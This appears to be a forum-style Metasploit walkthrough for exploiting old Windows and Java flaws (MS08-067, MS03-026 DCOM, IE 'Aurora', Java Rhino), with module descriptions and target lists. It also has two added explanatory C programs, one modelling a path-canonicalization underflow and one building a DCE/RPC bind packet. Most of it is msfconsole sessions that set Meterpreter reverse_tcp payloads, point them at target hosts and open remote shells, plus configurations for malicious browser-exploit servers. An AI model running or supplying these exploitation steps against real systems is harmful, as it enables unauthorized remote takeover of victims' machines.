Code:
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.
Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 14319
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
hdm <hdm@metasploit.com>
Brett Moore <brett.moore@insomniasec.com>
staylor
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (AlwaysOn NX)
4 Windows XP SP2 English (NX)
5 Windows XP SP3 English (AlwaysOn NX)
6 Windows XP SP3 English (NX)
7 Windows 2003 SP0 Universal
8 Windows 2003 SP1 English (NO NX)
9 Windows 2003 SP1 English (NX)
10 Windows 2003 SP1 Japanese (NO NX)
11 Windows 2003 SP2 English (NO NX)
12 Windows 2003 SP2 English (NX)
13 Windows 2003 SP2 German (NO NX)
14 Windows 2003 SP2 German (NX)
15 Windows XP SP2 Arabic (NX)
16 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
17 Windows XP SP2 Chinese - Simplified (NX)
18 Windows XP SP2 Chinese - Traditional (NX)
19 Windows XP SP2 Czech (NX)
20 Windows XP SP2 Danish (NX)
21 Windows XP SP2 German (NX)
22 Windows XP SP2 Greek (NX)
23 Windows XP SP2 Spanish (NX)
24 Windows XP SP2 Finnish (NX)
25 Windows XP SP2 French (NX)
26 Windows XP SP2 Hebrew (NX)
27 Windows XP SP2 Hungarian (NX)
28 Windows XP SP2 Italian (NX)
29 Windows XP SP2 Japanese (NX)
30 Windows XP SP2 Korean (NX)
31 Windows XP SP2 Dutch (NX)
32 Windows XP SP2 Norwegian (NX)
33 Windows XP SP2 Polish (NX)
34 Windows XP SP2 Portuguese - Brazilian (NX)
35 Windows XP SP2 Portuguese (NX)
36 Windows XP SP2 Russian (NX)
37 Windows XP SP2 Swedish (NX)
38 Windows XP SP2 Turkish (NX)
39 Windows XP SP3 Arabic (NX)
40 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
41 Windows XP SP3 Chinese - Simplified (NX)
42 Windows XP SP3 Chinese - Traditional (NX)
43 Windows XP SP3 Czech (NX)
44 Windows XP SP3 Danish (NX)
45 Windows XP SP3 German (NX)
46 Windows XP SP3 Greek (NX)
47 Windows XP SP3 Spanish (NX)
48 Windows XP SP3 Finnish (NX)
49 Windows XP SP3 French (NX)
50 Windows XP SP3 Hebrew (NX)
51 Windows XP SP3 Hungarian (NX)
52 Windows XP SP3 Italian (NX)
53 Windows XP SP3 Japanese (NX)
54 Windows XP SP3 Korean (NX)
55 Windows XP SP3 Dutch (NX)
56 Windows XP SP3 Norwegian (NX)
57 Windows XP SP3 Polish (NX)
58 Windows XP SP3 Portuguese - Brazilian (NX)
59 Windows XP SP3 Portuguese (NX)
60 Windows XP SP3 Russian (NX)
61 Windows XP SP3 Swedish (NX)
62 Windows XP SP3 Turkish (NX)
63 Windows 2003 SP2 Japanese (NO NX)
Basic options:
Name Current Setting Required Description
---- -- -- --
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 400
Avoid: 8 characters
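The description above places the bug in the path canonicalization code. The following C program is an added illustration, not code from Metasploit or from NetAPI32: it models that class of bug with a canonicalizer whose ".." handling scans backwards for the previous separator without checking that it has reached the start of its own buffer, beside a variant that refuses to climb above the root. The path syntax, the guard-byte layout and the two sample paths are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not Metasploit or NetAPI32 code): a simplified model of a
 * canonicaliser whose ".." handling walks back past the start of its buffer.
 * Paths look like "\a\b\..\c" and are rewritten to "\a\c"; out[0] holds the
 * root '\'. The unchecked variant assumes a '\' always exists before the
 * write pointer, so once it is at the root one more ".." sends the scan
 * into the memory in front of the buffer and the next component lands there.
 * The arena is constructed so that underflow stays inside one array: guard
 * bytes 'G' with a stray '\' planted at the very start precede the buffer.
 * In a real process those bytes are whatever the allocator left there. */

#define GUARD_LEN 16
#define PATH_LEN  64

typedef struct { char mem[GUARD_LEN + PATH_LEN]; } arena_t;

static void arena_init(arena_t *a) {
    memset(a->mem, 'G', sizeof a->mem);
    a->mem[0] = '\\';                  /* stray separator "somewhere before" the buffer */
    a->mem[GUARD_LEN] = '\\';          /* root of the path buffer */
    memset(a->mem + GUARD_LEN + 1, 0, PATH_LEN - 1);
}

static char *arena_path(arena_t *a) { return a->mem + GUARD_LEN; }

/* 1 if any guard byte other than the planted separator was modified. */
static int arena_guard_corrupted(const arena_t *a) {
    for (int i = 1; i < GUARD_LEN; i++)
        if (a->mem[i] != 'G') return 1;
    return 0;
}

/* Canonicalise `in` into `out` (out[0] already holds the root '\').
 * strict == 0: unchecked backward scan. strict == 1: reject paths that
 * would climb above the root. Returns 0 on success, -1 if rejected or if
 * the result would not fit in outlen bytes. */
static int canonicalize(const char *in, char *out, size_t outlen, int strict) {
    char *w = out;                     /* where the next "\component" is written */
    const char *p = in;
    while (*p) {
        while (*p == '\\') p++;        /* skip runs of separators */
        if (!*p) break;
        const char *comp = p;
        while (*p && *p != '\\') p++;
        size_t len = (size_t)(p - comp);
        if (len == 1 && comp[0] == '.') continue;            /* "." is a no-op */
        if (len == 2 && comp[0] == '.' && comp[1] == '.') {
            if (strict && w == out) return -1;               /* already at the root */
            do { w--; } while (*w != '\\');                  /* unchecked when !strict */
            continue;
        }
        if ((size_t)(out + outlen - w) < len + 2) return -1; /* '\' + comp + NUL */
        *w++ = '\\';
        memcpy(w, comp, len);
        w += len;
    }
    if (w == out) { out[1] = '\0'; return 0; }               /* bare root "\" */
    *w = '\0';
    return 0;
}

/* Runs one path through the chosen variant. Returns 0 = ok, -1 = rejected,
 * 1 = "succeeded" but wrote outside the path buffer. Copies the result to
 * `result` (if non-NULL) when the return value is 0. */
static int run_case(const char *in, int strict, char *result, size_t result_len) {
    arena_t a;
    arena_init(&a);
    int rc = canonicalize(in, arena_path(&a), PATH_LEN, strict);
    if (rc == 0 && arena_guard_corrupted(&a)) return 1;
    if (rc == 0 && result) snprintf(result, result_len, "%s", arena_path(&a));
    return rc;
}

/* 1 if `in` canonicalises cleanly to `expect` under the chosen variant. */
static int check_case(const char *in, int strict, const char *expect) {
    char buf[PATH_LEN];
    return run_case(in, strict, buf, sizeof buf) == 0 && strcmp(buf, expect) == 0;
}

int main(void) {
    /* Constructed inputs; the second has exactly enough ".." to reach the planted '\'. */
    const char *benign = "\\a\\b\\..\\c";
    const char *escape = "\\a\\..\\..\\b";
    char buf[PATH_LEN] = {0};
    int rc = run_case(benign, 0, buf, sizeof buf);
    printf("%-12s unchecked -> rc=%d result=\"%s\"\n", benign, rc, buf);
    printf("%-12s unchecked -> rc=%d (guard bytes overwritten)\n", escape, run_case(escape, 0, NULL, 0));
    printf("%-12s strict    -> rc=%d (rejected)\n", escape, run_case(escape, 1, NULL, 0));
    return 0;
}
```

Build with `cc -std=c99 -Wall canon.c && ./a.out`: the unchecked variant reports that bytes in front of the buffer were overwritten for the second path, while the strict variant rejects it. What sits in the memory the scan walks into, and what the overwritten bytes are later used for, depends on the OS build and service pack, which is what the long per-target list above and the warning about crashing the Server Service on a wrong target reflect.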
Example:
Code:
II dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
II 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 796 exploits - 435 auxiliary - 131 post
+ -- --=[ 242 payloads - 27 encoders - 8 nops
=[ svn r14663 updated today (2012.01.31)
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf exploit(ms08_067_netapi) > set lport 4444
lport => 4444
msf exploit(ms08_067_netapi) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:445)
Code:
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf exploit(ms03_026_dcom) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > set lport 4443
lport => 4443
msf exploit(ms03_026_dcom) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler on 192.168.2.103:4443
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135] ...
[*] Sending exploit ...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4443 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
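The "Binding to ... / Bound to ..." lines show the DCE/RPC bind that precedes the exploit request: the string names an interface (UUID plus version) reachable over TCP on the host and port in brackets. As an added example, not Metasploit code, this C program parses that endpoint string and serialises the 72-byte BIND PDU a client sends for it, following the field layout of the C706 / MS-RPCE specifications; nothing is transmitted, and the endpoint string is the one from the session above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example (not Metasploit code): parse "<uuid>:<major>.<minor>@ncacn_ip_tcp:
 * <host>[<port>]" and build the DCE/RPC BIND PDU (ptype 11) that proposes that
 * interface as the abstract syntax together with the NDR transfer syntax.
 * Offsets and constants follow C706 / MS-RPCE. Nothing is sent. */

typedef struct {
    uint8_t  uuid[16];                 /* interface UUID, wire order */
    uint16_t ver_major, ver_minor;
    char     host[64];
    uint16_t port;
} rpc_endpoint_t;

/* The endpoint string printed by the ms03_026_dcom session on this page. */
static const char DCOM_ENDPOINT[] =
    "4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.105[135]";

/* NDR 2.0 transfer syntax 8a885d04-1ceb-11c9-9fe8-08002b104860, wire order. */
static const uint8_t NDR_SYNTAX[16] = {
    0x04,0x5d,0x88,0x8a, 0xeb,0x1c, 0xc9,0x11, 0x9f,0xe8, 0x08,0x00,0x2b,0x10,0x48,0x60 };

/* Text UUID -> wire bytes. With little-endian DREP the first three fields
 * are byte-swapped and the last two are written as printed. */
static int uuid_to_wire(const char *text, uint8_t out[16]) {
    unsigned f[10];
    if (sscanf(text, "%8x-%4x-%4x-%4x-%2x%2x%2x%2x%2x%2x", &f[0], &f[1], &f[2],
               &f[3], &f[4], &f[5], &f[6], &f[7], &f[8], &f[9]) != 10) return -1;
    for (int i = 0; i < 4; i++) out[i] = (uint8_t)(f[0] >> (8 * i));
    out[4] = (uint8_t)f[1]; out[5] = (uint8_t)(f[1] >> 8);
    out[6] = (uint8_t)f[2]; out[7] = (uint8_t)(f[2] >> 8);
    out[8] = (uint8_t)(f[3] >> 8); out[9] = (uint8_t)f[3];
    for (int i = 0; i < 6; i++) out[10 + i] = (uint8_t)f[4 + i];
    return 0;
}

/* 0 on success, -1 if the string does not match the expected shape. */
static int parse_endpoint(const char *s, rpc_endpoint_t *ep) {
    char uuid[37];
    unsigned major, minor, port;
    if (sscanf(s, "%36[^:]:%u.%u@ncacn_ip_tcp:%63[^[][%u]",
               uuid, &major, &minor, ep->host, &port) != 5) return -1;
    if (major > 0xffff || minor > 0xffff || port > 0xffff) return -1;
    if (uuid_to_wire(uuid, ep->uuid) != 0) return -1;
    ep->ver_major = (uint16_t)major; ep->ver_minor = (uint16_t)minor; ep->port = (uint16_t)port;
    return 0;
}

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)v); put16(p + 2, (uint16_t)(v >> 16)); }

#define BIND_PDU_LEN 72

/* Serialise a single-context BIND for `ep` into buf[72]. Returns the PDU length. */
static size_t build_bind_pdu(const rpc_endpoint_t *ep, uint32_t call_id, uint8_t buf[BIND_PDU_LEN]) {
    memset(buf, 0, BIND_PDU_LEN);
    buf[0] = 5;  buf[1] = 0;          /* rpc_vers 5.0 */
    buf[2] = 11;                      /* ptype: bind */
    buf[3] = 0x03;                    /* pfc_flags: FIRST_FRAG | LAST_FRAG */
    buf[4] = 0x10;                    /* drep: little-endian ints, ASCII, IEEE (5-7 zero) */
    put16(buf + 8, BIND_PDU_LEN);     /* frag_length */
    put16(buf + 10, 0);               /* auth_length: no auth verifier */
    put32(buf + 12, call_id);
    put16(buf + 16, 5840);            /* max_xmit_frag */
    put16(buf + 18, 5840);            /* max_recv_frag */
    put32(buf + 20, 0);               /* assoc_group_id: request a new association */
    buf[24] = 1;                      /* n_context_elem, followed by 3 pad bytes */
    put16(buf + 28, 0);               /* p_cont_id */
    buf[30] = 1;                      /* n_transfer_syn, followed by 1 pad byte */
    memcpy(buf + 32, ep->uuid, 16);   /* abstract syntax: the interface UUID ... */
    put16(buf + 48, ep->ver_major);   /* ... and its version (major, minor) */
    put16(buf + 50, ep->ver_minor);
    memcpy(buf + 52, NDR_SYNTAX, 16); /* transfer syntax: NDR ... */
    put32(buf + 68, 2);               /* ... version 2 */
    return BIND_PDU_LEN;
}

/* Byte `off` of the BIND built for endpoint string `s`, or -1 on bad input. */
static int bind_byte(const char *s, size_t off) {
    rpc_endpoint_t ep; uint8_t pdu[BIND_PDU_LEN];
    if (parse_endpoint(s, &ep) != 0 || off >= build_bind_pdu(&ep, 1, pdu)) return -1;
    return pdu[off];
}

static int endpoint_port(const char *s) {
    rpc_endpoint_t ep;
    return parse_endpoint(s, &ep) == 0 ? (int)ep.port : -1;
}

int main(void) {
    rpc_endpoint_t ep; uint8_t pdu[BIND_PDU_LEN];
    if (parse_endpoint(DCOM_ENDPOINT, &ep) != 0) return 1;
    size_t n = build_bind_pdu(&ep, 1, pdu);
    printf("BIND to %s:%u, interface v%u.%u, %zu bytes:\n", ep.host, (unsigned)ep.port,
           (unsigned)ep.ver_major, (unsigned)ep.ver_minor, n);
    for (size_t i = 0; i < n; i++) printf("%02x%c", pdu[i], (i % 16 == 15 || i + 1 == n) ? '\n' : ' ');
    return 0;
}
```

Handy when reading a capture of this exchange on port 135: byte 2 is the packet type (11 = bind, 12 = bind_ack from the server), bytes 32-47 are the interface UUID in wire order, which is why the UUID looks byte-swapped in a hex dump compared with the text form Metasploit prints.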
Code:
msf > search aurora
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms10_002_aurora 2010-01-14 normal Internet Explorer "Aurora" Memory Corruption
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf exploit(ms10_002_aurora) > set lport 4444
lport => 4444
msf exploit(ms10_002_aurora) > set srvport 80
srvport => 80
msf exploit(ms10_002_aurora) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf exploit(ms10_002_aurora) > show options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- -- -- --
SRVHOST 192.168.2.103 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- -- -- --
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST 192.168.2.103 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_002_aurora) > set uripath /
uripath => /
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf exploit(ms10_002_aurora) > [*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.2.105
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
Info:
Code:
Name: Internet Explorer "Aurora" Memory Corruption
Module: exploit/windows/browser/ms10_002_aurora
Version: 14034
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
unknown
hdm <hdm@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- -- -- --
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 1000
Avoid: 1 characters
Description:
This module exploits a memory corruption flaw in Internet Explorer.
This flaw was found in the wild and was a key component of the
"Operation Aurora" attacks that lead to the compromise of a number
of high profile companies. The exploit code is a direct port of the
public sample published to the Wepawet malware analysis site. The
technique used by this module is currently identical to the public
sample, as such, only Internet Explorer 6 can be reliably exploited.
Java Rhino Example:
Code:
msf > use exploit/multi/browser/java_rhino
msf exploit(java_rhino) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(java_rhino) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf exploit(java_rhino) > set lport 4444
lport => 4444
msf exploit(java_rhino) > set uripath /
uripath => /
msf exploit(java_rhino) > set srvhost 192.168.2.103
srvhost => 192.168.2.103
msf exploit(java_rhino) > show options
Module options (exploit/multi/browser/java_rhino):
Name Current Setting Required Description
---- -- -- --
SRVHOST 192.168.2.103 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- -- -- --
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST 192.168.2.103 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
msf exploit(java_rhino) > set srvport 80
srvport => 80
msf exploit(java_rhino) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.103:4444
[*] Using URL: http://192.168.2.103:80/
[*] Server started.
msf exploit(java_rhino) > [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 192.168.2.100:50563...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending Applet.jar to 192.168.2.100:50564...
[*] Sending stage (752128 bytes) to 192.168.2.105
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:1098) at Tue Jan 31 21:35:35 +0000 2012
Java Rhino More Info:
Code:
Name: Java Applet Rhino Script Engine Remote Code Execution
Module: exploit/multi/browser/java_rhino
Version: 0
Platform: Java, Windows, Linux
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
Michael Schierl
juan vazquez
Edward D. Teach <teach@consortium-of-pwners.net>
sinn3r <sinn3r@metasploit.com>
Available targets:
Id Name
-- ----
0 Generic (Java Payload)
1 Windows Universal
2 Apple OSX
3 Linux x86
Basic options:
Name Current Setting Required Description
---- -- -- --
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 20480
Avoid: 0 characters
Description:
This module exploits a vulnerability in the Rhino Script Engine that
can be used by a Java Applet to run arbitrary Java code outside of
the sandbox. The vulnerability affects version 7 and version 6
update 27 and earlier, and should work on any browser that supports
Java (for example: IE, Firefox, Google Chrome, etc)
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-3544
http://www.osvdb.org/76500
http://www.zerodayinitiative.com/advisories/ZDI-11-305/
http://schierlm.users.sourceforge.net/CVE-2011-3544.html
Okay, so this needs settings similar to Aurora. So let's choose java_rhino:
Code:
use exploit/multi/browser/java_rhino
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.2.103
set lport 4444
set srvhost 192.168.2.103